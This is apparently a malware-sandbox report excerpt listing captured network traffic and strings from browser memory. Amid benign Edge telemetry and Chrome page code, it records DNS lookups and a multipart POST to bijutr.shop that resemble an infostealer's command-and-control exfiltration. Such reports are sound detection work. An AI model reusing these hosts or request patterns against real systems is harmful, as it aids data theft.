                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735279295839&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=338156387e954518bddd6ad5da364bdb&activityId=338156387e954518bddd6ad5da364bdb&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0A6FD663C8E04E24A976289B56E6D1F3&MUID=3918B198F66063F3328CA4FAF7676296 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; SM=T
                Source: 0abb4798-9ad1-4876-a169-ff21bd97f0a9.tmp.27.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log3.27.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log3.27.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log3.27.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.2610390393.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610572297.000051D800F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000011.00000003.2610390393.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610572297.000051D800F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcap equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlault equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----U3E3EC2VAAAIEUKFK6XBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000011.00000003.2607988142.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2607463400.000051D80038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2608029609.000051D800A84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
